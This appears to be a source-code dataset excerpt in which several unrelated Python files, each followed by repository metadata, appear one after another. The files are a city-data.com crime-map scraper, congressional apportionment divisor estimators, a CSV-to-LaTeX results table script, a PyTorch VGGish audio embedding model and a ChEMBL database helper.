zipcode_parser = lambda x: re.findall(r"^\d{5}(?=\, [A-Z]{2}$)", str(x).strip())[0]
state_parser = lambda x: re.findall(r"(?<=^\d{5}\, )[A-Z]{2}$", str(x).strip())[0]
geography_parser = lambda x: {"block groups": "blockgroup", "tracts": "tract", "counties": "county", "states": "state"}[re.findall(r"(?<=Displaying\: )[a-z ]+(?=\.)", str(x).strip())[0]]
geography_pattern = r"(?P<blockgroup>(?<=Census Block Group )[\.0-9]+)|(?P<tract>(?<=Census Tract )[\.0-9]+)|(?P<state>(?<=\, )[A-Z]{2}|(?<=\()[A-Z]{2}(?=\)))|(?P<county>[a-zA-Z ]+ County(?=\, ))"
class CityData_DatasetSelect(WebSelect, webloader=dataset_select_webloader, mapping=DATASETS): pass
class CityData_ZipcodeClick(WebClickable, webloader=zipcode_click_webloader): pass
class CityData_ZipcodeInput(WebInput, webloader=zipcode_input_webloader): pass
class CityData_Zipcode(WebText, webloader=zipcode_webloader, parsers={"data": zipcode_parser}): pass
class CityData_Geography(WebText, webloader=geography_webloader, parsers={"data": geography_parser}): pass
class CityData_Canvas(WebClickable, webloader=canvas_webloader): pass
class CityData_FullScreen(WebClickable, webloader=fullscreen_webloader): pass
class CityData_ZoomIn(WebClickable, webloader=zoomin_webloader): pass
class CityData_ZoomOut(WebClickable, webloader=zoomout_webloader): pass
class CityData_Scroll_WebAction(WebScroll): pass
class CityData_DatasetSelect_MoveToClickSelect_WebAction(WebMoveToClickSelect, on=CityData_DatasetSelect, wait=3): pass
class CityData_ZipcodeClick_MoveToClick_WebAction(WebMoveToClick, on=CityData_ZipcodeClick, wait=1): pass
class CityData_ZipcodeInput_MoveToClick_WebAction(WebMoveToClickFillSend, on=CityData_ZipcodeInput, wait=1): pass
class CityData_Canvas_MoveTo_WebAction(WebMoveTo, on=CityData_Canvas): pass
class CityData_FullScreen_MoveToClick_WebAction(WebMoveToClick, on=CityData_FullScreen): pass
class CityData_ZoomIn_MoveToClick_WebAction(WebMoveToClick, on=CityData_ZoomIn): pass
class CityData_ZoomOut_MoveToClick_WebAction(WebMoveToClick, on=CityData_ZoomOut): pass
class CityData_WebDelayer(WebDelayer): pass
class CityData_WebDriver(WebDriver, options={"headless": False, "images": True, "incognito": False}): pass
class CityData_WebURL(WebURL, protocol="https", domain="www.city-data.com"): pass
class CityData_WebQuery(WebQuery, querys=["zipcode", "geography"]): pass
class CityData_WebDatasets(WebDatasets, fields=list(DATASETS.keys())): pass
class CityData_WebScheduler(WebScheduler, querys=["zipcode"], geography=list(GEOGRAPHYS[1:])):
def zipcode(self, *args, state=None, county=None, countys=[], city=None, citys=[], **kwargs):
dataframe = self.load(QUEUE_FILE)
assert all([isinstance(item, (str, type(None))) for item in (county, city)])
assert all([isinstance(item, list) for item in (countys, citys)])
countys = list(set([item for item in [county, *countys] if item]))
citys = list(set([item for item in [city, *citys] if item]))
dataframe = dataframe_parser(dataframe, parsers={"zipcode": lambda x: "{:05.0f}".format(int(x))}, defaultparser=str)
dataframe = dataframe[["zipcode", "type", "city", "state", "county"]]
dataframe = dataframe[dataframe["type"] == "standard"][["zipcode", "city", "state", "county"]].reset_index(drop=True)
dataframe = dataframe[(dataframe["city"].isin(list(citys)) | dataframe["county"].isin(list(countys)))]
dataframe = dataframe[dataframe["state"] == state]
return list(dataframe["zipcode"].to_numpy())
@staticmethod
def execute(querys, *args, **kwargs): return [CityData_WebQuery(query) for query in querys]
class CityData_WebContents(WebContents):
SCROLL = CityData_Scroll_WebAction
ZIPCODE = CityData_Zipcode
GEOGRAPHY = CityData_Geography
SELECT = CityData_DatasetSelect_MoveToClickSelect_WebAction
CLICK = CityData_ZipcodeClick_MoveToClick_WebAction
INPUT = CityData_ZipcodeInput_MoveToClick_WebAction
CANVAS = CityData_Canvas_MoveTo_WebAction
FULLSCREEN = CityData_FullScreen_MoveToClick_WebAction
ZOOMIN = CityData_ZoomIn_MoveToClick_WebAction
ZOOMOUT = CityData_ZoomOut_MoveToClick_WebAction
class CityData_WebPage(WebBrowserPage, contents=CityData_WebContents):
def search(self, *args, dataset, zipcode, **kwargs):
assert dataset in DATASETS
self.load[CityData_WebContents.SCROLL](*args, **kwargs)
self[CityData_WebContents.SCROLL](*args, commands={"pagedown": 1}, **kwargs)
LOGGER.info("Search: {}|{}|{}".format(str(self), str(dataset).title(), str(zipcode)))
self.load[CityData_WebContents.SELECT](*args, **kwargs)
self[CityData_WebContents.SELECT](*args, select=str(dataset), **kwargs)
self.load[CityData_WebContents.CLICK](*args, **kwargs)
self.load[CityData_WebContents.INPUT](*args, **kwargs)
self[CityData_WebContents.CLICK](*args, **kwargs)
self[CityData_WebContents.INPUT](*args, fill=str(zipcode), **kwargs)
self[CityData_WebContents.CLICK](*args, offset=(0, 1), **kwargs)
def setup(self, *args, geography, **kwargs):
assert geography in GEOGRAPHYS
self.load[CityData_WebContents.CANVAS](*args, **kwargs)
self.load[CityData_WebContents.FULLSCREEN](*args, **kwargs)
self.load[CityData_WebContents.ZOOMIN](*args, **kwargs)
self.load[CityData_WebContents.ZOOMOUT](*args, **kwargs)
self[CityData_WebContents.FULLSCREEN](*args, **kwargs)
self.load[CityData_WebContents.GEOGRAPHY](*args, **kwargs)
while self[CityData_WebContents.GEOGRAPHY].data() != geography:
if GEOGRAPHYS.index(self[CityData_WebContents.GEOGRAPHY].data()) < GEOGRAPHYS.index(geography):
self[CityData_WebContents.ZOOMIN](*args, **kwargs)
elif GEOGRAPHYS.index(self[CityData_WebContents.GEOGRAPHY].data()) > GEOGRAPHYS.index(geography):
self[CityData_WebContents.ZOOMOUT](*args, **kwargs)
elif GEOGRAPHYS.index(self[CityData_WebContents.GEOGRAPHY].data()) == GEOGRAPHYS.index(geography):
break
else:
pass
self.sleep(5)
self.load[CityData_WebContents.GEOGRAPHY](*args, **kwargs)
self.load[CityData_WebContents.CANVAS](*args, **kwargs)
self.load[CityData_WebContents.ZIPCODE](*args, **kwargs)
self.load[CityData_WebContents.GEOGRAPHY](*args, **kwargs)
@property
def query(self): return {"zipcode": str(self[CityData_WebContents.ZIPCODE].data()), "geography": str(self[CityData_WebContents.GEOGRAPHY].data())}
def execute(self, *args, dataset, **kwargs):
# print(self.source.execute_script("return window.GetPolyStats()"))
# print(self.source.execute_script("return window.getCurrentLevel()"))
# x = list(self.source.execute_script("return window.polyFIPS"))
# y = list(dict(self.source.execute_script("return window.pv"))["pv"])
# raise Exception()
yield dataset, data
class CityData_WebDownloader(WebDownloader + (CacheMixin, AttemptsMixin), attempts=3, delay=30):
@staticmethod
def execute(*args, queue, delayer, **kwargs):
with CityData_WebDriver(DRIVER_FILE, browser="chrome", loadtime=50) as driver:
page = CityData_WebPage(driver, delayer=delayer)
with queue:
for query in iter(queue):
with query:
url = CityData_WebURL(**query.todict())
page.load(url, referer=None)
try:
page.search(*args, **query.todict(), **kwargs)
except BadRequestError:
yield query, CityData_WebDatasets({})
continue
page.setup(*args, **query.todict(), **kwargs)
for dataset, dataframe in page(*args, **query.todict(), **kwargs):
yield query, CityData_WebDatasets({dataset: dataframe})
def main(*args, **kwargs):
delayer = CityData_WebDelayer("constant", wait=3)
scheduler = CityData_WebScheduler(*args, file=REPORT_FILE, **kwargs)
downloader = CityData_WebDownloader(*args, repository=REPOSITORY_DIR, **kwargs)
queue = scheduler(*args, **kwargs)
downloader(*args, queue=queue, delayer=delayer, **kwargs)
LOGGER.info(str(downloader))
for results in downloader.results:
LOGGER.info(str(results))
if not bool(downloader):
raise downloader.error
if __name__ == "__main__":
sys.argv += ["state=CA", "city=Bakersfield", "dataset=violentcrime", "geography=tract"]
logging.basicConfig(level="INFO", format="[%(levelname)s, %(threadName)s]: %(message)s")
inputparser = InputParser(proxys={"assign": "=", "space": "_"}, parsers={}, default=str)
inputparser(*sys.argv[1:])
main(*inputparser.arguments, **inputparser.parameters)
| 47.964844 | 197 | 0.710807 | 7,480 | 0.60917 | 1,318 | 0.107338 | 1,187 | 0.096669 | 0 | 0 | 2,145 | 0.174688 |
7b072a958ac36c49b32339e29f7e4de28848fadd
| 3,644 |
py
|
Python
|
apportionpy/experimental/boundary.py
|
btror/apportionpy
|
5b70dbeee4b197e41794bed061ea4a11f128d1c8
|
[
"MIT"
] | null | null | null |
apportionpy/experimental/boundary.py
|
btror/apportionpy
|
5b70dbeee4b197e41794bed061ea4a11f128d1c8
|
[
"MIT"
] | null | null | null |
apportionpy/experimental/boundary.py
|
btror/apportionpy
|
5b70dbeee4b197e41794bed061ea4a11f128d1c8
|
[
"MIT"
] | null | null | null |
import math
def estimate_lowest_divisor(method, divisor, populations, seats):
"""
Calculates the estimated lowest possible divisor.
:param method: The method used.
:type method: str
:param divisor: A working divisor in calculating fair shares.
:type divisor: float
:param populations: The populations for each state respectively.
:type populations: [float]
:param seats: The amount of seats to apportion.
:type seats: int
:return: An estimation of the lowest possible divisor.
"""
# The number of states to apportion to.
    states = len(populations)
# Initialize lists for fair shares and quotas.
quotas = [0] * states
fair_shares = [0] * states
# Keep track of the previous divisor calculated and lowest of them.
prev_divisor = 0
lowest_divisor = 0
# Estimator to use in predicting divisors.
estimator = 1000000000
counter = 0
while counter < 1000:
for i, population in enumerate(populations):
if divisor is None or population is None:
return None
quotas[i] = population / divisor
if method.upper() == "ADAM":
fair_shares[i] = math.ceil(quotas[i])
elif method.upper() == "WEBSTER":
fair_shares[i] = round(quotas[i])
elif method.upper() == "JEFFERSON":
fair_shares[i] = math.floor(quotas[i])
if sum(fair_shares) != seats:
estimator = estimator / 10
prev_divisor = divisor
divisor = lowest_divisor - estimator
else:
lowest_divisor = divisor
divisor = prev_divisor - estimator
if lowest_divisor == divisor:
break
counter += 1
return math.ceil(lowest_divisor * 1000) / 1000
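# Hedged usage sketch (the populations, starting divisor and seat count below are
# hypothetical; the returned estimate depends on the starting divisor supplied):
#
#   populations = [21878, 9713, 4167]
#   low = estimate_lowest_divisor("JEFFERSON", 1000, populations, 35)
#   high = estimate_highest_divisor("JEFFERSON", 1000, populations, 35)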
def estimate_highest_divisor(method, divisor, populations, seats):
"""
Calculates the estimated highest possible divisor.
:param method: The method used.
:type method: str
:param divisor: A working divisor in calculating fair shares.
:type divisor: float
:param populations: The populations for each state respectively.
:type populations: [float]
:param seats: The amount of seats to apportion.
:type seats: int
:return: An estimation of the lowest possible divisor.
"""
# The number of states to apportion to.
    states = len(populations)
# Initialize lists for fair shares and quotas.
quotas = [0] * states
fair_shares = [0] * states
# Keep track of the previous divisor calculated and highest of them.
prev_divisor = 0
highest_divisor = 0
# Estimator to use in predicting divisors.
estimator = 1000000000
counter = 0
while counter < 1000:
for i, population in enumerate(populations):
if divisor is None or population is None:
return None
quotas[i] = population / divisor
if method.upper() == "ADAM":
fair_shares[i] = math.ceil(quotas[i])
elif method.upper() == "WEBSTER":
fair_shares[i] = round(quotas[i])
elif method.upper() == "JEFFERSON":
fair_shares[i] = math.floor(quotas[i])
if sum(fair_shares) != seats:
estimator = estimator / 10
prev_divisor = divisor
divisor = highest_divisor + estimator
else:
highest_divisor = divisor
divisor = prev_divisor - estimator
if highest_divisor == divisor:
break
counter += 1
return math.ceil(highest_divisor * 1000) / 1000
| 30.881356 | 72 | 0.611416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,344 | 0.368825 |
7b0bcb46e200df6f78d9fe78eb07f700564fadd3
| 4,084 |
py
|
Python
|
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | 1 |
2021-11-10T10:28:01.000Z
|
2021-11-10T10:28:01.000Z
|
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | null | null | null |
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
# import pylatex
from pylatex import Document, Section, Tabular, Math, Axis, Subsection
import pandas as pd
import sys
import os
def main():
pm = u"\u00B1"
filename = sys.argv[1]
results = pd.read_csv(filename+'.csv')
cols = results.columns
task_fusion = ((results.loc[results['settings']=='overall']).loc[results['model']!='DummyClassifier']).sort_values('model')
reading = ((results.loc[results['settings']=='Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
cookie = ((results.loc[results['settings']=='CookieTheft']).loc[results['model']!='DummyClassifier']).sort_values('model')
memory = ((results.loc[results['settings']=='Memory']).loc[results['model']!='DummyClassifier']).sort_values('model')
pupil = ((results.loc[results['settings']=='PupilCalib']).loc[results['model']!='DummyClassifier']).sort_values('model')
ET_basic = ((results.loc[results['settings']=='ET_basic']).loc[results['model']!='DummyClassifier']).sort_values('model')
Eye = ((results.loc[results['settings']=='Eye']).loc[results['model']!='DummyClassifier']).sort_values('model')
Language = ((results.loc[results['settings']=='Language']).loc[results['model']!='DummyClassifier']).sort_values('model')
Eye_Reading = ((results.loc[results['settings']=='Eye_Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
NLP_Reading = ((results.loc[results['settings']=='NLP_Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
TextAudio = ((results.loc[results['settings']=='Text+Audio']).loc[results['model']!='DummyClassifier']).sort_values('model')
task_fusion = np.array(task_fusion.dropna()).astype('str')
reading = np.array(reading.dropna()).astype('str')
cookie = np.array(cookie.dropna()).astype('str')
memory = np.array(memory.dropna()).astype('str')
pupil = np.array(pupil.dropna()).astype('str')
ET_basic = np.array(ET_basic.dropna()).astype('str')
Eye = np.array(Eye.dropna()).astype('str')
Language = np.array(Language.dropna()).astype('str')
Eye_Reading = np.array(Eye_Reading.dropna()).astype('str')
NLP_Reading = np.array(NLP_Reading.dropna()).astype('str')
TextAudio = np.array(TextAudio.dropna()).astype('str')
abc = np.array((task_fusion, reading, cookie, memory, pupil, ET_basic, Eye, Language, Eye_Reading, NLP_Reading, TextAudio))
for i in range(len(abc)):
for j in range(len(abc[i])):
if abc[i][j][1] == 'RandomForest':
abc[i][j][1] = 'RF'
elif abc[i][j][1] == 'GausNaiveBayes':
abc[i][j][1] = 'GNB'
elif abc[i][j][1] == 'LogReg':
abc[i][j][1] = 'LR'
geometry_options = {"tmargin": "1cm", "lmargin": "1cm"}
doc = Document(geometry_options=geometry_options)
# for overall task_fusion_result
with doc.create(Section('Results')):
for i in range(len(abc)):
overall = abc[i]
with doc.create(Subsection(overall[0][0])):
with doc.create(Tabular('c c c c c c c c')) as table:
table.add_hline()
table.add_row(('Algo', 'N', 'AUC', 'F1', 'Accuracy', 'Precision', 'Recall', 'Specificity'))
table.add_hline()
for i in range(len(overall)):
table.add_row((overall[i][1], '162',
overall[i][3] + pm + overall[i][12], # roc
overall[i][4] + pm + overall[i][9], # f1
overall[i][2] + pm + overall[i][8], # acc
overall[i][5] + pm + overall[i][10], # prec
overall[i][6] + pm + overall[i][11], # rec
overall[i][7] + pm + overall[i][13])) # spec
doc.generate_pdf(filename, clean_tex=False, compiler='pdflatex')
main()
| 51.696203 | 131 | 0.578355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 938 | 0.229677 |
7b0d0466817dc17050d1085421ef9276feb2fb86
| 2,803 |
py
|
Python
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 26 |
2020-03-25T21:19:33.000Z
|
2022-02-01T15:14:29.000Z
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 7 |
2020-05-31T07:57:05.000Z
|
2021-12-23T10:16:55.000Z
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 8 |
2020-10-27T16:22:55.000Z
|
2022-03-28T22:48:07.000Z
|
import os.path as osp
import yaml
import torch.nn as nn
from torch import hub
__all__ = ['get_vggish', 'vggish_category_metadata']
model_urls = {
'vggish': "https://github.com/w-hc/vggish/releases/download/v0.1/vggish_orig.pth",
'vggish_with_classifier': "https://github.com/w-hc/vggish/releases/download/v0.1/vggish_with_classifier.pth"
}
def vggish_category_metadata():
cat_meta_file = osp.join(
osp.dirname(osp.realpath(__file__)), 'classifier_category.yml'
)
with open(cat_meta_file) as f:
cat_meta = yaml.safe_load(f) # [ [cat_name, mid], ... ]
cat_meta = [ {'name': e[0], 'id': e[1]} for e in cat_meta ]
return cat_meta
class VGGish(nn.Module):
def __init__(self):
super().__init__()
self.features = self.make_layers()
self.embeddings = nn.Sequential(
nn.Linear(512 * 4 * 6, 4096),
nn.ReLU(True),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Linear(4096, 128),
nn.ReLU(True),
)
@staticmethod
def make_layers():
layer_config = [64, "M", 128, "M", 256, 256, "M", 512, 512, "M"]
in_channels = 1
layers = []
for curr in layer_config:
if curr == "M":
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, curr, kernel_size=3, padding=1)
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = curr
return nn.Sequential(*layers)
def forward(self, x):
'''
x: [N, C, T]
'''
        # It's regrettable that the TensorFlow authors of this model treat the audio signal as 2d
# [N, C, T] -> [N, C, T, 1]
x = self.features(x)
x = x.permute(0, 2, 3, 1) # to tf's [N, H, W, C] order
x = x.reshape(x.shape[0], -1)
x = self.embeddings(x)
return x
class VGGishClassify(VGGish):
'''
    Beware that this is a multi-label, not a multi-class, classifier.
'''
def __init__(self, num_hidden_units=100, num_classes=527):
super().__init__()
self.classifier = nn.Sequential(
nn.Linear(128, num_hidden_units),
nn.ReLU(True),
nn.Linear(num_hidden_units, num_classes),
)
def forward(self, x):
x = super().forward(x)
x = self.classifier(x)
return x
def get_vggish(with_classifier=False, pretrained=True):
if with_classifier:
model = VGGishClassify()
url = model_urls['vggish_with_classifier']
else:
model = VGGish()
url = model_urls['vggish']
if pretrained:
state_dict = hub.load_state_dict_from_url(url, progress=True)
model.load_state_dict(state_dict)
return model
| 29.197917 | 112 | 0.576882 | 1,735 | 0.61898 | 0 | 0 | 510 | 0.181948 | 0 | 0 | 576 | 0.205494 |
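A minimal usage sketch for the VGGish model defined above. The import path is assumed from the record's file path (torch_audioset.vggish.model), pretrained=False avoids the weight download, and the [N, 1, 96, 64] input shape (96 frames x 64 mel bands) is inferred from the 512 * 4 * 6 embedding input size.

import torch
from torch_audioset.vggish.model import get_vggish  # assumed import path

model = get_vggish(with_classifier=False, pretrained=False)
model.eval()
dummy = torch.randn(2, 1, 96, 64)  # [N, C, frames, mel bands]
with torch.no_grad():
    emb = model(dummy)
print(emb.shape)  # torch.Size([2, 128])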
7b0d272861a3704f10e9a92801a2d879819c1a06
| 12,584 |
py
|
Python
|
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
import os
import warnings
import pandas
import sqlite3
import logging
from typing import List
from dask import delayed, dataframe
from contextlib import closing
from cuchemcommon.utils.singleton import Singleton
from cuchemcommon.context import Context
warnings.filterwarnings("ignore", message=r"deprecated", category=FutureWarning)
logger = logging.getLogger(__name__)
BATCH_SIZE = 100000
ADDITIONAL_FEILD = ['canonical_smiles', 'transformed_smiles']
IMP_PROPS = [
'alogp',
'aromatic_rings',
'full_mwt',
'psa',
'rtb']
IMP_PROPS_TYPE = [pandas.Series([], dtype='float64'),
pandas.Series([], dtype='int64'),
pandas.Series([], dtype='float64'),
pandas.Series([], dtype='float64'),
pandas.Series([], dtype='int64')]
ADDITIONAL_FEILD_TYPE = [pandas.Series([], dtype='object'),
pandas.Series([], dtype='object')]
SQL_MOLECULAR_PROP = """
SELECT md.molregno as molregno, md.chembl_id, cp.*, cs.*
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.molregno in (%s)
"""
# DEPRECATED. Please add code to DAO classes.
class ChEmblData(object, metaclass=Singleton):
def __init__(self, fp_type):
context = Context()
db_file = context.get_config('data_mount_path', default='/data')
db_file = os.path.join(db_file, 'db/chembl_27.db')
if not os.path.exists(db_file):
logger.error('%s not found', db_file)
raise Exception('{} not found'.format(db_file))
self.fp_type = fp_type
self.chembl_db = 'file:%s?mode=ro' % db_file
logger.info('ChEMBL database: %s...' % self.chembl_db)
def fetch_props_by_molregno(self, molregnos):
"""
Returns compound properties and structure filtered by ChEMBL IDs along
with a list of columns.
"""
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = SQL_MOLECULAR_PROP % " ,".join(list(map(str, molregnos)))
cur.execute(select_stmt)
cols = list(map(lambda x: x[0], cur.description))
return cols, cur.fetchall()
def fetch_props_by_chemble(self, chemble_ids):
"""
Returns compound properties and structure filtered by ChEMBL IDs along
with a list of columns.
"""
sql_stml = """
SELECT md.molregno as molregno, md.chembl_id, cp.*, cs.*
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.chembl_id in (%s)
"""
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = sql_stml % "'%s'" % "','".join([x.strip().upper() for x in chemble_ids])
cur.execute(select_stmt)
cols = list(map(lambda x: x[0], cur.description))
return cols, cur.fetchall()
def fetch_molregno_by_chemblId(self, chemblIds):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT md.molregno as molregno
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.chembl_id in (%s)
''' % "'%s'" % "','".join(chemblIds)
cur.execute(select_stmt)
return cur.fetchall()
def fetch_id_from_chembl(self, new_molecules: List):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT cs.molregno as molregno, md.chembl_id as chembl_id,
cs.canonical_smiles as smiles
FROM compound_structures cs,
molecule_dictionary md
WHERE md.molregno = cs.molregno
AND md.chembl_id in (%s)
''' % "'%s'" % "','".join([x.strip().upper() for x in new_molecules])
cur.execute(select_stmt)
return cur.fetchall()
def fetch_chemblId_by_molregno(self, molregnos):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT md.chembl_id as chembl_id
FROM molecule_dictionary md
WHERE md.molregno in (%s)
''' % ", ".join(list(map(str, molregnos)))
cur.execute(select_stmt)
return cur.fetchall()
def fetch_approved_drugs(self):
"""Fetch approved drugs with phase >=3 as dataframe
Args:
chembl_db_path (string): path to chembl sqlite database
Returns:
pd.DataFrame: dataframe containing SMILES strings and molecule index
"""
logger.debug('Fetching ChEMBL approved drugs...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = """SELECT
di.molregno,
cs.canonical_smiles,
di.max_phase_for_ind
FROM
drug_indication AS di
LEFT JOIN compound_structures AS cs ON di.molregno = cs.molregno
WHERE
di.max_phase_for_ind >= 3
AND cs.canonical_smiles IS NOT NULL;"""
cur.execute(select_stmt)
return cur.fetchall()
def fetch_random_samples(self, num_samples, max_len):
"""Fetch random samples from ChEMBL as dataframe
Args:
num_samples (int): number of samples to select
chembl_db_path (string): path to chembl sqlite database
Returns:
pd.DataFrame: dataframe containing SMILES strings and molecule index
"""
logger.debug('Fetching ChEMBL random samples...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = """SELECT
cs.molregno,
cs.canonical_smiles,
LENGTH(cs.canonical_smiles) as len
FROM
compound_structures AS cs
WHERE
cs.canonical_smiles IS NOT NULL
AND
                    len <= """ + f'{max_len}' + """
ORDER BY RANDOM()
LIMIT """ + f'{num_samples};'
cur.execute(select_stmt)
return cur.fetchall()
def fetch_molecule_cnt(self):
logger.debug('Finding number of molecules...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT count(*)
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
'''
cur.execute(select_stmt)
return cur.fetchone()[0]
def _meta_df(self, **transformation_kwargs):
transformation = self.fp_type(**transformation_kwargs)
prop_meta = {'id': pandas.Series([], dtype='int64')}
prop_meta.update(dict(zip(IMP_PROPS + ADDITIONAL_FEILD,
IMP_PROPS_TYPE + ADDITIONAL_FEILD_TYPE)))
prop_meta.update({i: pandas.Series([], dtype='float32') for i in range(len(transformation))})
return pandas.DataFrame(prop_meta)
def _fetch_mol_embedding(self,
start=0,
batch_size=BATCH_SIZE,
molregnos=None,
**transformation_kwargs):
"""
Returns compound properties and structure for the first N number of
records in a dataframe.
"""
logger.info('Fetching %d records starting %d...' % (batch_size, start))
imp_cols = ['cp.' + col for col in IMP_PROPS]
if molregnos is None:
select_stmt = '''
SELECT md.molregno, %s, cs.canonical_smiles
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
LIMIT %d, %d
''' % (', '.join(imp_cols), start, batch_size)
else:
select_stmt = '''
SELECT md.molregno, %s, cs.canonical_smiles
FROM compound_properties cp,
molecule_dictionary md,
compound_structures cs
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.molregno in (%s)
LIMIT %d, %d
''' % (', '.join(imp_cols), " ,".join(list(map(str, molregnos))), start, batch_size)
df = pandas.read_sql(select_stmt,
sqlite3.connect(self.chembl_db, uri=True))
# Smiles -> Smiles transformation and filtering
# TODO: Discuss internally to find use or refactor this code to remove
# model specific filtering
df['transformed_smiles'] = df['canonical_smiles']
# if smiles_transforms is not None:
# if len(smiles_transforms) > 0:
# for xf in smiles_transforms:
# df['transformed_smiles'] = df['transformed_smiles'].map(xf.transform)
# df.dropna(subset=['transformed_smiles'], axis=0, inplace=True)
# Conversion to fingerprints or embeddings
# transformed_smiles = df['transformed_smiles']
transformation = self.fp_type(**transformation_kwargs)
cache_data = transformation.transform(df)
return_df = pandas.DataFrame(cache_data)
return_df = pandas.DataFrame(
return_df,
columns=pandas.RangeIndex(start=0,
stop=len(transformation))).astype('float32')
return_df = df.merge(return_df, left_index=True, right_index=True)
return_df.rename(columns={'molregno': 'id'}, inplace=True)
return return_df
def fetch_mol_embedding(self,
num_recs=None,
batch_size=BATCH_SIZE,
molregnos=None,
**transformation_kwargs):
"""
Returns compound properties and structure for the first N number of
records in a dataframe.
"""
logger.debug('Fetching properties for all molecules...')
if num_recs is None or num_recs < 0:
num_recs = self.fetch_molecule_cnt()
logger.info('num_recs %d', num_recs)
logger.info('batch_size %d', batch_size)
meta_df = self._meta_df(**transformation_kwargs)
dls = []
for start in range(0, num_recs, batch_size):
bsize = min(num_recs - start, batch_size)
dl_data = delayed(self._fetch_mol_embedding)(start=start,
batch_size=bsize,
molregnos=molregnos,
**transformation_kwargs)
dls.append(dl_data)
return dataframe.from_delayed(dls, meta=meta_df)
def save_fingerprints(self, hdf_path='data/filter_*.h5', num_recs=None, batch_size=5000):
"""
Generates fingerprints for all ChEMBL ID's in the database
"""
logger.debug('Fetching molecules from database for fingerprints...')
mol_df = self.fetch_mol_embedding(num_recs=num_recs, batch_size=batch_size)
mol_df.to_hdf(hdf_path, 'fingerprints')
| 39.202492 | 101 | 0.565559 | 11,324 | 0.899873 | 0 | 0 | 0 | 0 | 0 | 0 | 5,663 | 0.450016 |
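The fetch_mol_embedding method above assembles a Dask dataframe from delayed per-batch loaders plus an explicit meta frame. Here is a toy, database-free sketch of that same pattern (the loader name and sizes are illustrative, not part of the original code).

import pandas as pd
from dask import delayed, dataframe


def load_batch(start, batch_size):
    # Stand-in for _fetch_mol_embedding: returns one batch as a pandas frame.
    return pd.DataFrame({'id': range(start, start + batch_size)})


meta = pd.DataFrame({'id': pd.Series([], dtype='int64')})
parts = [delayed(load_batch)(start, 10) for start in range(0, 50, 10)]
ddf = dataframe.from_delayed(parts, meta=meta)
print(ddf.compute().shape)  # (50, 1)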
7b0dd834a233f033a4537593bd1c545e5c4ea02a
| 769 |
py
|
Python
|
tests/app/users/migrations/0001_initial.py
|
silverlogic/djangorestframework-timed-auth-token
|
0884559c6b5e4021d7a8830ec5dd60f2799d0ee4
|
[
"MIT"
] | 34 |
2015-05-22T00:02:49.000Z
|
2021-12-29T11:42:31.000Z
|
tests/app/users/migrations/0001_initial.py
|
silverlogic/djangorestframework-timed-auth-token
|
0884559c6b5e4021d7a8830ec5dd60f2799d0ee4
|
[
"MIT"
] | 6 |
2015-05-22T00:04:50.000Z
|
2021-06-10T17:49:38.000Z
|
tests/app/users/migrations/0001_initial.py
|
silverlogic/djangorestframework-timed-auth-token
|
0884559c6b5e4021d7a8830ec5dd60f2799d0ee4
|
[
"MIT"
] | 6 |
